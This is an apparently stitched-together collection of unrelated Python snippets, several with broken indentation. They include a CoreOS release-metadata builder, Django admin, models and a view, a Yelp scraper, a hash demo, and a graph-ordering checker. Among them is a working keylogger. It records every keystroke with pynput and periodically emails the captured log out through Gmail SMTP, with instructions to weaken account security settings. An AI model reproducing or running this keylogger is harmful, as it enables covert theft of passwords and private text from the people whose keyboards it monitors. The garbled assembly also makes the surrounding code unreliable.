    builds = Builds()
    # default to latest build if not specified
    if args.build_id:
        buildid = args.build_id
    else:
        buildid = builds.get_latest()
    print(f"Creating release.json for build {buildid}")
    base_builddir = f"builds/{buildid}"
    arches = builds.get_build_arches(buildid)
    parsed_builds = []
    for arch in arches:
        with open(os.path.join(base_builddir, arch, "meta.json")) as f:
            parsed_builds.append(json.load(f))
    return (base_builddir, parsed_builds)
out = {}
parsed_builds = []
if len(args.url) == 0:
# FIXME: Remove this once https://github.com/coreos/fedora-coreos-pipeline/ is ported
# not to pass --workdir (it always uses `.` anyways)
if args.workdir not in (None, '.'):
os.chdir(args.workdir)
(builddir, parsed_builds) = gather_buildmeta_from_workdir()
# Default to writing into the builddir for now
if args.output is None:
args.output = os.path.join(builddir, "release.json")
else:
for url in args.url:
print(f"Downloading {url}...")
r = requests.get(url)
r.raise_for_status()
parsed_builds.append(r.json())
# If any existing data, inherit it (if it's non-empty)
if os.path.exists(args.output) and os.stat(args.output).st_size > 0:
with open(args.output, 'r') as w:
out = json.load(w)
print(f"Using existing release file {args.output}")
def get_floating_tag(rel, tags):
    """Return the single tag in *tags* that does not embed the release id
    *rel* (the "floating" tag, e.g. "stable").

    Raises Exception if no tag qualifies or more than one does.
    """
    found = ""
    for tag in tags:
        if rel not in tag:
            if found != "":
                # BUG FIX: the original did `raise f"..."`; raising a str
                # produces TypeError("exceptions must derive from
                # BaseException") instead of the intended message.
                raise Exception(f"multiple floating tags within: {tags}")
            found = tag
    if found == "":
        raise Exception(f"failed to find floating tag within: {tags}")
    return found
# Append the coreos-assembler build json `input_` to `out`, the target release stream.
def append_build(out, input_):
    """Merge one per-arch coreos-assembler meta.json (*input_*) into the
    release-stream dict *out*.

    Validates that the release id and stream name agree with what is
    already in *out* (ensure_dup raises on mismatch), builds the
    per-architecture media/artifact tree, then installs it — or, when the
    arch already exists, merges per media type and raises on any
    conflicting content.
    """
    arch = input_.get("coreos-assembler.basearch")
    ensure_dup(input_, out, "buildid", "release")
    # Stream name comes from --stream-name when given, otherwise from the
    # build's container-config git metadata.
    streamnamesrc = None
    if args.stream_name:
        streamnamesrc = {'branch': args.stream_name}
    else:
        streamnamesrc = input_.get('coreos-assembler.container-config-git')
    ensure_dup(streamnamesrc, out, 'branch', 'stream')
    def artifact(i):
        # Location/signature/checksum record for one image dict from meta.json.
        # Signature URL is derived by convention (<location>.sig) and
        # blanked out under --no-signatures.
        base_url = url_builder(out.get('stream'), out.get('release'), arch, i.get('path'))
        sig = "{}.sig".format(base_url)
        if args.no_signatures:
            sig = ''
        return {
            "location": base_url,
            "signature": sig,
            "sha256": i.get("sha256"),
            "uncompressed-sha256": i.get("uncompressed-sha256")
        }
    print(f"{out['stream']} stream")
    print(f"  {arch} images:")
    # build the architectures dict
    arch_dict = {"media": {}}
    ensure_dup(input_, arch_dict, "ostree-commit", "commit")
    platforms = ["aliyun", "applehv", "aws", "azure", "azurestack", "digitalocean", "exoscale", "gcp", "hyperv", "ibmcloud", "kubevirt", "metal", "nutanix", "openstack", "powervs", "qemu", "virtualbox", "vmware", "vultr", "qemu-secex"]
    for platform in platforms:
        if input_.get("images", {}).get(platform, None) is not None:
            print(f"  - {platform}")
            i = input_.get("images").get(platform)
            ext = get_extension(i.get('path'), platform, arch)
            arch_dict['media'][platform] = {
                "artifacts": {
                    ext: {
                        "disk": artifact(i)
                    }
                }
            }
    # Aliyun/AWS specific additions
    for meta_key, cloud, image_field in ("aliyun", "aliyun", "id"), ("amis", "aws", "hvm"):
        if input_.get(meta_key, None) is not None:
            arch_dict["media"].setdefault(cloud, {}).setdefault("images", {})
            for cloud_dict in input_.get(meta_key):
                arch_dict["media"][cloud]["images"][cloud_dict["name"]] = {
                    "image": cloud_dict[image_field]
                }
    # IBMCloud/PowerVS specific additions
    for meta_key, cloud, object_field, bucket_field, url_field in \
            ("ibmcloud", "ibmcloud", "object", "bucket", "url"), \
            ("powervs", "powervs", "object", "bucket", "url"):
        if input_.get(meta_key, None) is not None:
            arch_dict["media"].setdefault(cloud, {}).setdefault("images", {})
            for cloud_dict in input_.get(meta_key):
                arch_dict["media"][cloud]["images"][cloud_dict["region"]] = {
                    "object": cloud_dict[object_field],
                    "bucket": cloud_dict[bucket_field],
                    "url": cloud_dict[url_field]
                }
    # IBM Secure Execution specific additions
    # NOTE(review): assumes a qemu-secex image entry already created the
    # "qemu-secex" media key above whenever ignition-gpg-key is present —
    # otherwise this is a KeyError; confirm meta.json always pairs them.
    i = input_.get("images", {}).get("ignition-gpg-key", None)
    if i is not None:
        arch_dict["media"]["qemu-secex"]["ignition-gpg-key"] = artifact(i)
    # GCP specific additions
    if input_.get("gcp", None) is not None:
        arch_dict["media"].setdefault("gcp", {}).setdefault("image", {})
        arch_dict["media"]["gcp"]["image"].update(input_.get("gcp", {}))
        # release.json calls the field "name"; meta.json calls it "image".
        arch_dict["media"]["gcp"]["image"]["name"] = arch_dict["media"]["gcp"]["image"].pop("image")
        # remove the url as we haven't decided to expose that information publicly yet
        arch_dict["media"]["gcp"]["image"].pop("url")
    # KubeVirt specific additions: https://github.com/coreos/stream-metadata-go/pull/41
    if input_.get("kubevirt", None) is not None:
        arch_dict["media"].setdefault("kubevirt", {}).setdefault("image", {})
        # The `image` field uses a floating tag and the `digest-ref` field uses
        # a digest pullspec. See: https://github.com/coreos/stream-metadata-go/pull/46.
        tag = get_floating_tag(input_["buildid"], input_["kubevirt"]["tags"])
        arch_dict["media"]["kubevirt"]["image"] = {
            "image": input_["kubevirt"]["image"] + f":{tag}",
            "digest-ref": input_["kubevirt"]["image"] + "@" + input_["kubevirt"]["digest"],
        }
    # Azure: https://github.com/coreos/stream-metadata-go/issues/13
    inputaz = input_.get("azure")
    if inputaz is not None:
        rhcosext = arch_dict.setdefault("rhel-coreos-extensions", {})
        rhcosext["azure-disk"] = {
            "url": inputaz["url"]
        }
    # metal specific additions
    arch_dict["media"]["metal"] = arch_dict["media"].get("metal", {})
    arch_dict["media"]["metal"]["artifacts"] = arch_dict["media"]["metal"].get("artifacts", {})
    i = input_.get("images", {}).get("metal4k", None)
    if i is not None:
        # the 4k image is kinda weird; we want it at the same level as e.g.
        # the regular 512b image, which normally is under `raw.xz`
        ext = get_extension(i['path'], 'metal4k', arch)
        arch_dict["media"]["metal"]["artifacts"][f"4k.{ext}"] = {
            "disk": artifact(i)
        }
    i = input_.get("images", {}).get("iso", None)
    if i is not None:
        arch_dict["media"]["metal"]["artifacts"]["installer.iso"] = {
            "disk": artifact(i)
        }
    i = input_.get("images", {}).get("kernel", None)
    if i is not None:
        arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["kernel"] = artifact(i)
    i = input_.get("images", {}).get("initramfs", None)
    if i is not None:
        arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["initramfs"] = artifact(i)
    i = input_.get("images", {}).get("live-iso", None)
    if i is not None:
        arch_dict["media"]["metal"]["artifacts"]["iso"] = {
            "disk": artifact(i)
        }
    i = input_.get("images", {}).get("live-kernel", None)
    if i is not None:
        arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["kernel"] = artifact(i)
    i = input_.get("images", {}).get("live-initramfs", None)
    if i is not None:
        arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["initramfs"] = artifact(i)
    i = input_.get("images", {}).get("live-rootfs", None)
    if i is not None:
        arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["rootfs"] = artifact(i)
    # if architectures as a whole or the individual arch is empty just push our changes
    if out.get('architectures', None) is None or out['architectures'].get(arch, None) is None:
        oa = out.get('architectures', {})
        oa[arch] = arch_dict
        out['architectures'] = oa
    # else check media warning if key present, appending if not
    else:
        out_arch = out['architectures'][arch]
        for media_type, val in arch_dict.get('media').items():
            if media_type not in out_arch['media']:
                out['architectures'][arch]['media'].update({media_type: val})
            elif val == out_arch['media'][media_type]:
                continue
            else:
                raise Exception("differing content detected for media type '{}'".format(media_type))
for build in parsed_builds:
append_build(out, build)
with open(args.output, 'w') as w:
json.dump(out, w)
print(f"Successfully wrote release file at {args.output}")
|
#
# AUTHOR: Natchapol Srisang (UtopiaBeam)
# KEYWORD: Topological ordering
#
# Read the graph once, then check five candidate vertex orderings
# against the same edge list.
n, m = map(int, input().split())
edges = [tuple(map(int, input().split())) for _ in range(m)]
for _ in range(5):
    ls = list(map(int, input().split()))
    # Map each vertex to its position in the candidate ordering.
    dc = dict(zip(ls, range(n)))
    for s, e in edges:
        # An edge s -> e is violated when s appears after e.
        if dc[s] > dc[e]:
            print('FAIL')
            break
    else:
        # for/else: this runs only when the loop finished without break,
        # i.e. no edge violated the ordering.
        print('SUCCESS')
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import *
@admin.register(Food)
class FoodAdmin(admin.ModelAdmin):
    """Admin listing for Food: all nutritional fields plus timestamps."""
    list_display = ('id', 'name', 'portion', 'portion_unit', 'fats', 'protein', 'sodium', 'carbohidrates', 'cholesterol','calories', 'created_at', 'last_updated_at',)
@admin.register(Group)
class GroupAdmin(admin.ModelAdmin):
    """Admin listing for Group: name plus timestamps."""
    list_display = ('id', 'name','created_at', 'last_updated_at',)
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
    """Admin listing for Category: name plus timestamps."""
    list_display = ('id', 'name', 'created_at', 'last_updated_at',)
admin.site.register(User, UserAdmin)
|
from django.db import models
from listings.models import Country, Province, City, Zone, OpertationType, PropertyType
# Create your models here.
class CountryData(models.Model):
    """
    EACH DATA POINT REPRESENTS ONE MONTH
    - Each time a new listing is saved the state in the
    current month is updated if it already exist, otherwise
    a new data point is created
    - Calculations are made based on the previous state
    and the new listing to avoid recalculations
    """
    operation_type = models.ForeignKey(OpertationType, on_delete=models.SET_NULL, null=True)
    property_type = models.ForeignKey(PropertyType, on_delete=models.SET_NULL, null=True)
    country = models.ForeignKey(Country, on_delete=models.SET_NULL, null=True)
    # Set once on creation; presumably marks the month this point covers.
    date = models.DateField(auto_now_add=True)
    # NOTE(review): the docstring implies these are running monthly
    # aggregates, but the aggregation code is not in this module — confirm.
    price = models.IntegerField()
    rooms = models.IntegerField()
    bedrooms = models.IntegerField()
    bathrooms = models.IntegerField()
    surface_total = models.IntegerField()
    surface_covered = models.IntegerField()
class ProvinceData(models.Model):
    """
    EACH DATA POINT REPRESENTS ONE MONTH
    - Each time a new listing is saved the state in the
    current month is updated if it already exist, otherwise
    a new data point is created
    - Calculations are made based on the previous state
    and the new listing to avoid recalculations
    """
    # Same shape as CountryData, scoped to a Province.
    operation_type = models.ForeignKey(OpertationType, on_delete=models.SET_NULL, null=True)
    property_type = models.ForeignKey(PropertyType, on_delete=models.SET_NULL, null=True)
    province = models.ForeignKey(Province, on_delete=models.SET_NULL, null=True)
    date = models.DateField(auto_now_add=True)
    price = models.IntegerField()
    rooms = models.IntegerField()
    bedrooms = models.IntegerField()
    bathrooms = models.IntegerField()
    surface_total = models.IntegerField()
    surface_covered = models.IntegerField()
class CityData(models.Model):
    """Monthly listing statistics scoped to a City (same shape as CountryData)."""
    operation_type = models.ForeignKey(OpertationType, on_delete=models.SET_NULL, null=True)
    property_type = models.ForeignKey(PropertyType, on_delete=models.SET_NULL, null=True)
    city = models.ForeignKey(City, on_delete=models.SET_NULL, null=True)
    date = models.DateField(auto_now_add=True)
    price = models.IntegerField()
    rooms = models.IntegerField()
    bedrooms = models.IntegerField()
    bathrooms = models.IntegerField()
    surface_total = models.IntegerField()
    surface_covered = models.IntegerField()
class ZoneData(models.Model):
    """Monthly listing statistics scoped to a Zone (same shape as CountryData)."""
    operation_type = models.ForeignKey(OpertationType, on_delete=models.SET_NULL, null=True)
    property_type = models.ForeignKey(PropertyType, on_delete=models.SET_NULL, null=True)
    zone = models.ForeignKey(Zone, on_delete=models.SET_NULL, null=True)
    date = models.DateField(auto_now_add=True)
    price = models.IntegerField()
    rooms = models.IntegerField()
    bedrooms = models.IntegerField()
    bathrooms = models.IntegerField()
    surface_total = models.IntegerField()
    surface_covered = models.IntegerField()
|
import requests
from bs4 import BeautifulSoup
# Fetch a Yelp search-results page and probe a couple of selectors.
# NOTE(review): scraping Yelp's rendered HTML is fragile — the
# "secondary-attributes" class below may no longer exist in the current
# markup (a None result from find() would indicate that).
url = "https://www.yelp.ca/search?find_desc=Restaurants&find_loc=Sherwood+Park%2C+AB&ns=1"
yelp_r = requests.get(url)
print(yelp_r.status_code)
yelp_soup = BeautifulSoup(yelp_r.text, 'html.parser')
#print(yelp_soup.prettify())
#print(yelp_soup.findAll('a'))
# Pull Page Title
#print ("\nThe Page Title is: " + yelp_soup.title.text)
#for link in yelp_soup.findAll('a'):
#    print(link.get('href'))
print(yelp_soup.find("div", class_="secondary-attributes"))
print(yelp_soup.find_all("title"))
|
import hashlib

# Demonstrates the avalanche effect: sha256 takes bytes, and flipping a
# single character ('H' -> 'h') yields a completely different digest.
original_message = b"Hola soy un string!"
altered_message = b"hola soy un string!"

first_output = hashlib.sha256(original_message)
second_output = hashlib.sha256(altered_message)

print(f"First input: {original_message}")
print(first_output.hexdigest())
print("##############################")
print(f"Second input: {altered_message}")
print(second_output.hexdigest())
print("##############################")
print(f"Are the same?: {first_output.hexdigest() == second_output.hexdigest()}")
import pynput.keyboard #this library allow us to manage user keyboard and mouse
import threading
import smtplib
import optparse
log =""
def getargs():
    """Parse -e/--email, -p/--password and -i/--interval from the command
    line.  All three are mandatory; parser.error() prints the message and
    exits when one is missing, so plain ifs suffice in place of elif."""
    parser = optparse.OptionParser()  # command line options and arguments
    parser.add_option("-e", "--email", dest="email", help="your email")
    parser.add_option("-p", "--password", dest="password", help="your email password")
    parser.add_option("-i", "--interval", dest="interval", help="enter the time interval")
    options, _ = parser.parse_args()
    if not options.email:
        parser.error("Please Specify email --help for more info")
    if not options.password:
        parser.error("please provide password --help for more info")
    if not options.interval:
        parser.error("please provide interval --help for more info")
    return options
option = getargs()
def process_key_press(key):
    # Append the pressed key to the module-level log buffer.
    global log
    try:
        # Printable keys expose .char; append the character itself.
        log=log+str(key.char)
    except AttributeError:
        # Special keys (Shift, Enter, ...) have no .char attribute.
        if(key == key.space):
            # NOTE(review): reaching Key.space via the instance (key.space)
            # relies on enum member attribute fallback — confirm it works
            # on the pynput/Python versions in use.
            log= log + " "
        else:
            # Record other special keys by name, e.g. " Key.enter ".
            log =log + " "+str(key)+" "
def send_mail(email, password,message):
    # Send *message* from the account to itself via Gmail SMTP with
    # STARTTLS.  If login or sendmail raises, quit() is never reached and
    # the connection leaks — acceptable here since report() re-creates it.
    server = smtplib.SMTP("smtp.gmail.com",587)
    server.starttls()
    server.login(email,password)
    server.sendmail(email,email,message)
    server.quit()
def report():
    # Email the buffered keystrokes, clear the buffer, then re-arm a
    # one-shot Timer so report() fires again after the configured
    # interval without blocking the keyboard listener thread.
    global log
    send_mail(option.email,option.password,log)
    log=""
    timer = threading.Timer(int(option.interval),report)
    timer.start()
keyboard_listner = pynput.keyboard.Listener(on_press = process_key_press)
with keyboard_listner:
print("https://myaccount.google.com/lesssecureapps?pli=1 make sure less secure app enable")
report()
keyboard_listner.join()
|
from django.shortcuts import render
from game.models import Oyunlar
from haberler.models import Haber,AddFavoriHaber, YorumHaber
from forum.models import Forum, Yorumforum, LikeYorum, LikeForum
from user.models import AddMyFriends, User
def anasayfa(request):
    """Home page view: one random featured game plus two more random games,
    the six most-liked news items with their favourite/comment counts,
    the five most-liked forum posts and, for authenticated users, their
    friends ordered by most recent login."""
    oyun_active=Oyunlar.objects.order_by("?").first()
    # Two additional random games, excluding the featured one.
    oyun=Oyunlar.objects.exclude(id=oyun_active.id).order_by("?")[:2]
    haberlerr=Haber.objects.all().order_by("-toplamBegenme")[:6]
    # NOTE(review): guncelHaberler is computed but never used below —
    # confirm before removing.
    guncelHaberler=Haber.objects.all().order_by("-id")[:5]
    # Favourite count per news item, encoded as strings ("0" when none).
    liste=list()
    for i in haberlerr:
        kontrol=AddFavoriHaber.objects.filter(haber=i).first()
        if kontrol is not None:
            liste.append(str(AddFavoriHaber.objects.filter(haber=i).count()))
        else:
            liste.append("0")
    # Comment count per news item, same encoding.
    liste2=list()
    for i in haberlerr:
        kontrol=YorumHaber.objects.filter(yorumHaber=i).first()
        if kontrol is not None:
            liste2.append(str(YorumHaber.objects.filter(yorumHaber=i).count()))
        else:
            liste2.append("0")
    # Pair each news item with its two counts for the template.
    zipp=zip(haberlerr, liste, liste2)
    paylasimlargüncel=Forum.objects.all().order_by("-BegenmeSayısı")[:5]
    if request.user.is_authenticated:
        arkadaslar=AddMyFriends.objects.filter(ekleyen=request.user).values("eklenen")
        arkadaslarr=User.objects.filter(id__in=arkadaslar).order_by("-last_login")
    else:
        # The template receives this sentinel string when nobody is logged in.
        arkadaslarr="Giriş Yapılmamış"
    context={
        "oyunlar":oyun,
        "oyunlar_active":oyun_active,
        "haberlerr":zipp,
        "paylasimlargüncel":paylasimlargüncel,
        "arkadaslar":arkadaslarr,
    }
    return render(request,"anaSayfa.html", context)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.